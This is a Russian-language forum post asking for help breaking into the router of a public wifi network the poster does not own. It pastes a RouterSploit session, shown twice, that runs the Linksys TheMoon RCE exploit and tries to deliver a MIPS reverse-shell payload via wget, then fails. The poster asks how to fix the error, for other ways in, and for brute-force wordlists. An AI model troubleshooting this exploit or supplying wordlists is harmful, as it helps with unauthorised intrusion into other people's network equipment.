Привет, сейчас подключен к публичной wifi сети (с паролем), но скорее всего без должной защиты. Роутер KEENETIC VIVA
Использую роутерсплоит (У меня WSL KALI), cначала использовал сканер, роутер уязвим к exploits/routers/linksys/eseries_themoon_rce
Далее вводил следующие команды:
rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.24
[+] target => 192.168.1.24
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module exploits/routers/linksys/eseries_themoon_rce...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
mipsle/bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.
mipsle/reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.
cmd > set payload mipsle/reverse_tcp
cmd (MIPSLE Reverse TCP) > set lhost 192.168.1.24
lhost => 192.168.1.24
cmd (MIPSLE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[-] Exploit failed to transfer payload
cmd (MIPSLE Reverse TCP) >
cmd (MIPSLE Reverse TCP) > run
[*] Using wget method
[-] Could not set up HTTP Server on 192.168.1.24:5555
[-] Exploit failed to transfer payload
Если что, все данные указал верно
Просто смотря на ошибку понятно что полезной нагрузке не удается создать сервер на порту 5555, я попробовал открыть его на ноуте, не помогло.
Что можно сделать что-бы избежать эту ошибку, или роутер вовсе не уязвим.
Может есть другие способы взлома, если брутфорс скиньте словари пожалуйста.
Использую роутерсплоит (У меня WSL KALI), cначала использовал сканер, роутер уязвим к exploits/routers/linksys/eseries_themoon_rce
Далее вводил следующие команды:
rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.24
[+] target => 192.168.1.24
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module exploits/routers/linksys/eseries_themoon_rce...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
mipsle/bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.
mipsle/reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.
cmd > set payload mipsle/reverse_tcp
cmd (MIPSLE Reverse TCP) > set lhost 192.168.1.24
lhost => 192.168.1.24
cmd (MIPSLE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[-] Exploit failed to transfer payload
cmd (MIPSLE Reverse TCP) >
cmd (MIPSLE Reverse TCP) > run
[*] Using wget method
[-] Could not set up HTTP Server on 192.168.1.24:5555
[-] Exploit failed to transfer payload
Если что, все данные указал верно
Просто смотря на ошибку понятно что полезной нагрузке не удается создать сервер на порту 5555, я попробовал открыть его на ноуте, не помогло.
Что можно сделать что-бы избежать эту ошибку, или роутер вовсе не уязвим.
Может есть другие способы взлома, если брутфорс скиньте словари пожалуйста.